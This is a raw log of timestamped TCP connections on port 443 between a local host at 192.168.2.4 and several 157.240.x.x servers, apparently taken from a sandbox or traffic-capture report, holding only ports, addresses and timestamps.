                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.473716974 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.474220991 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.474284887 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.474349022 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.502288103 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.502590895 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.502629995 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.503098965 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.503518105 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.503518105 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.503597021 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.519406080 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.546477079 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.546477079 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.578742981 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.579067945 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.579080105 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.580101967 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.580193996 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.580666065 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.580666065 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.580729961 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.623853922 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.624131918 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.624140024 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.624713898 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.624773026 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.624779940 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.625180960 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.625247002 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.625550985 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.625642061 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.625655890 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.636642933 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.636717081 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.636775970 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.640939951 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.641011000 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.641025066 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.671407938 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.703752995 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.703840971 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.703906059 CEST49760443192.168.2.4157.240.253.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.703921080 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.703984022 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.704035044 CEST49760443192.168.2.4157.240.253.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.704046965 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.704085112 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.704138994 CEST49760443192.168.2.4157.240.253.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.704835892 CEST49760443192.168.2.4157.240.253.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.704844952 CEST44349760157.240.253.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.715941906 CEST49824443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.715967894 CEST44349824157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.716052055 CEST49824443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.716370106 CEST49824443192.168.2.4157.240.251.35
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.716386080 CEST44349824157.240.251.35192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.727268934 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.727319956 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.727365971 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.727396965 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.727411985 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.727488995 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.730081081 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.730113983 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.730154037 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.730165005 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.730191946 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.730211973 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.732395887 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.732465029 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.732472897 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.732933998 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.733016014 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.733021975 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746325970 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746349096 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746387959 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746407986 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746448040 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746448040 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746454954 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746592045 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746876955 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.746943951 CEST44349816157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747011900 CEST49816443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747370958 CEST49825443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747396946 CEST44349825157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747505903 CEST49825443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747555017 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747638941 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.747647047 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.748343945 CEST49825443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.748357058 CEST44349825157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764472961 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764492989 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764559031 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764568090 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764611006 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764632940 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764666080 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.764687061 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.786492109 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.786581039 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.786622047 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.793405056 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.793441057 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.793483019 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.793498993 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.793529034 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.793550968 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.814615965 CEST44349823157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.815026045 CEST49823443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.815064907 CEST44349823157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.818806887 CEST44349823157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.818873882 CEST49823443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.819262981 CEST49823443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.819319963 CEST44349823157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.819401979 CEST49823443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820766926 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820782900 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820811987 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820830107 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820830107 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820841074 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820851088 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820858955 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820890903 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820890903 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.820918083 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832170010 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832206964 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832250118 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832263947 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832284927 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832292080 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832314968 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832328081 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.832379103 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836524963 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836534023 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836580038 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836602926 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836601019 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836616993 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836637974 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836652040 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836652040 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836662054 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836684942 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.836808920 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.852684975 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.852761030 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.852776051 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.853003025 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.854865074 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.854896069 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.854939938 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.854948044 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.854969978 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.854978085 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.855000019 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.855015039 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.855058908 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.856262922 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.856338024 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.856344938 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.856384993 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.856416941 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.863420963 CEST44349823157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870784044 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870790958 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870827913 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870860100 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870863914 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870882988 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870892048 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870899916 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870910883 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.870932102 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880464077 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880481005 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880491018 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880515099 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880522966 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880532026 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880553961 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880568027 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880573988 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880585909 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880585909 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880608082 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880611897 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880640984 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880675077 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.880706072 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883204937 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883219957 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883249044 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883304119 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883322001 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883352041 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.883374929 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.884681940 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.884746075 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.884762049 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.884882927 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.885134935 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.888397932 CEST49817443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.888427973 CEST44349817157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899754047 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899761915 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899821043 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899847984 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899878979 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899887085 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899904966 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.899935961 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.903819084 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.903888941 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.903903961 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908178091 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908241987 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908301115 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908549070 CEST49819443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908564091 CEST44349819157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908827066 CEST49826443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908869982 CEST44349826157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.908940077 CEST49826443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.909734011 CEST49826443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.909750938 CEST44349826157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.915950060 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.915965080 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.915982962 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.915992022 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916043043 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916059017 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916085958 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916624069 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916649103 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916677952 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916688919 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916738987 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916744947 CEST44349820157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.916790962 CEST49820443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.917875051 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.917953014 CEST44349822157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.918071985 CEST49822443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.920285940 CEST49827443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.920321941 CEST44349827157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.920615911 CEST49827443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921372890 CEST49827443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921390057 CEST44349827157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921845913 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921883106 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921927929 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921933889 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921962976 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921967983 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921982050 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.921988010 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.922033072 CEST49818443192.168.2.4157.240.251.9
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941483021 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941499949 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941523075 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941533089 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941540003 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941567898 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941580057 CEST44349821157.240.0.6192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941611052 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.941631079 CEST49821443192.168.2.4157.240.0.6
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.945843935 CEST44349818157.240.251.9192.168.2.4
                                                                                                                                                                                                                                Sep 29, 2024 06:54:23.945925951 CEST44349818157.240.251.9192.168.2.4
